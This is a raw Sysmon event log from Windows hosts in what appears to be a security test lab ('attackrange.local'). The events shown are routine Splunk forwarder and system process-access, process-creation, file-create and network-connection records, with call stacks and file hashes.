07:52:27.538{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807624Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:27.538{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807623Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:27.538{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807622Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:27.538{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807621Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:27.538{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807620Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:27.538{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807619Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:27.538{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807618Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:27.538{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807617Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:27.538{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807616Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:27.538{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F4BB-60EB-7879-00000000D001}3816C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807615Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:27.538{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F4BB-60EB-7879-00000000D001}3816C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807614Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:27.523{0C1E0330-F4BB-60EB-7879-00000000D001}3816C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807613Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:27.522{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DABB6E03078A12B6136115210758F6D9,SHA256=2B5699FC61AA7D351DF7D813FEA417C61069A8373BC2FDDDDABED88D6B80CBD4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048932Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:27.441{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBEEE652031D318A8E98FD64C2EDA4F0,SHA256=22D0C474E11F3C2E96D69D8191413162E444E33C1FB8DCAC04B118A6F94D77EA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048931Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:19.783{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51025-false10.0.1.12-8000- 10341000x8000000000000000807612Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:27.007{0C1E0330-F4BA-60EB-7779-00000000D001}32562988C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000807643Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:28.991{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26E7B9A4BCF431C52179BD9134ABFC18,SHA256=38EF928E187EBE79F2EF64D7E38109CB40136342D388F6EA8207814063C0DBE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048933Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:28.459{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB6F43CF408DC4ECCFED61BCF18A040A,SHA256=23F1A3D0A637847EBA7038ADF8FC933A8571334726A20B9505ED9639A3393D0F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807642Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:28.350{0C1E0330-F4BC-60EB-7979-00000000D001}33521076C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807641Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:28.225{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F4BC-60EB-7979-00000000D001}3352C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807640Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:28.225{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807639Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:28.225{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807638Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:28.225{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807637Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:28.225{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807636Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:28.225{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807635Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:28.225{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807634Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:52:28.225{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807633Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:28.225{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807632Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
